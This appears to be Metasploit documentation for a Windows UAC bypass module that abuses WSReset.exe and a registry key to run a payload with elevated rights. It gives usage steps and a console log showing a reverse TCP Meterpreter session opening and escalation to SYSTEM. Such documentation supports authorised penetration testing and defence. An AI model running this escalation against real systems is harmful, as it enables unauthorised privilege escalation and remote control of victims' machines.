## Introduction

This module exploits a flaw in the WSReset.exe Windows Store Reset Tool. The tool
is run with the "autoElevate" property set to true, and it will automatically
launch a file from a low-privilege registry location with elevated privileges.
To bypass, simply place the binary on disk, write its location in the
correct registry key, and run WSReset.exe.  The binary will be run with elevated
privileges.

## Usage

1. Create a session on the target system under the context of a local administrative user.
1. Begin interacting with the module: `use exploit/windows/local/bypassuac_windows_store_reg`.
1. Set the `PAYLOAD` and configure it correctly.
1. If an existing handler is configured to receive the elevated session, then the module's
   handler should be disabled: `set DisablePayloadHandler true`.
1. Make sure that the `SESSION` value is set to the existing session identifier.
1. Invoke the module: `run`.

## Scenarios

### Windows 10.0.17134.885 x64

```
msf5 exploit(windows/local/bypassuac_windows_store_reg) > run

[*] Started reverse TCP handler on 192.168.135.168:4444 
[*] UAC is Enabled, checking level...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] win_dir = C:\Windows
[*] tmp_dir = C:\Users\msfuser\AppData\Local\Temp
[*] exploit_dir = C:\Windows\System32\
[*] exploit_file = C:\Windows\System32\WSReset.exe
[*] payload_pathname = C:\Users\msfuser\AppData\Local\Temp\LSbJpvsW.exe
[*] Making Payload
[*] reg_command = C:\Windows\System32\cmd.exe /c start C:\Users\msfuser\AppData\Local\Temp\LSbJpvsW.exe
[*] Making Registry Changes
[*] Registry Changes Complete
[*] Uploading Payload to C:\Users\msfuser\AppData\Local\Temp\LSbJpvsW.exe
[*] Payload Upload Complete
[*] Launching C:\Windows\System32\WSReset.exe
[!] This exploit requires manual cleanup of 'C:\Users\msfuser\AppData\Local\Temp\LSbJpvsW.exe!
[*] Sending stage (206403 bytes) to 192.168.132.125
[*] Meterpreter session 4 opened (192.168.135.168:4444 -> 192.168.132.125:49680) at 2019-09-04 17:01:46 -0500
[*] Removing Registry Changes
[*] Registry Changes Removed

meterpreter > sysinfo
Computer        : DESKTOP-3DKRD1E
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-3DKRD1E\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
